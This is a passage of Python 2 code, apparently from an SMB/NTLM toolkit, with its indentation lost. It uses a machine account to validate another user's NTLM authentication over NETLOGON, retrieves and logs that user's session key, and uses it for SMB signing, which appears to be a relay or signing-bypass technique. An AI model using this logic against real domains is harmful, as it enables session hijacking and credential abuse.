av_pairs = authenticateMessage['ntlm'][44:]
av_pairs = ntlm.AV_PAIRS(av_pairs)
serverName = av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
except:
# We're in NTLMv1, not supported
return STATUS_ACCESS_DENIED
stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.domainIp
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if len(self.machineHashes) > 0:
lmhash, nthash = self.machineHashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(machineAccount,'', domainName, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName+'\x00', '12345678')
serverChallenge = resp['ServerChallenge']
if self.machineHashes == '':
ntHash = None
else:
ntHash = unhexlify(self.machineHashes.split(':')[1])
sessionKey = nrpc.ComputeSessionKeyStrongKey('', '12345678', serverChallenge, ntHash)
ppp = nrpc.ComputeNetlogonCredential('12345678', sessionKey)
nrpc.hNetrServerAuthenticate3(dce, NULL, machineAccount + '\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName + '\x00',
ppp, 0x600FFFFF)
clientStoredCredential = pack('<Q', unpack('<Q',ppp)[0] + 10)
# Now let's try to verify the security blob against the PDC
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request['ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request['LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity']['LogonDomainName'] = domainName
request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 0
request['LogonInformation']['LogonNetworkTransitive']['Identity']['UserName'] = authenticateMessage['user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity']['Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive']['LmChallenge'] = challenge
request['LogonInformation']['LogonNetworkTransitive']['NtChallengeResponse'] = authenticateMessage['ntlm']
request['LogonInformation']['LogonNetworkTransitive']['LmChallengeResponse'] = authenticateMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 10
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = '\x00'*8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
#request.dump()
try:
resp = dce.request(request)
#resp.dump()
except Exception, e:
#import traceback
#print traceback.print_exc()
logging.error(str(e))
return e.get_error_code()
logging.info("%s\\%s successfully validated through NETLOGON" % (
domainName, authenticateMessage['user_name'].decode('utf-16le')))
encryptedSessionKey = authenticateMessage['session_key']
if encryptedSessionKey != '':
signingKey = ntlm.generateEncryptedSessionKey(
resp['ValidationInformation']['ValidationSam4']['UserSessionKey'], encryptedSessionKey)
else:
signingKey = resp['ValidationInformation']['ValidationSam4']['UserSessionKey']
logging.info("SMB Signing key: %s " % hexlify(signingKey))
self.set_session_key(signingKey)
self._SignatureEnabled = True
self._SignSequenceNumber = 2
self.set_flags(flags1 = SMB.FLAGS1_PATHCASELESS, flags2 = SMB.FLAGS2_EXTENDED_SECURITY)
return STATUS_SUCCESS
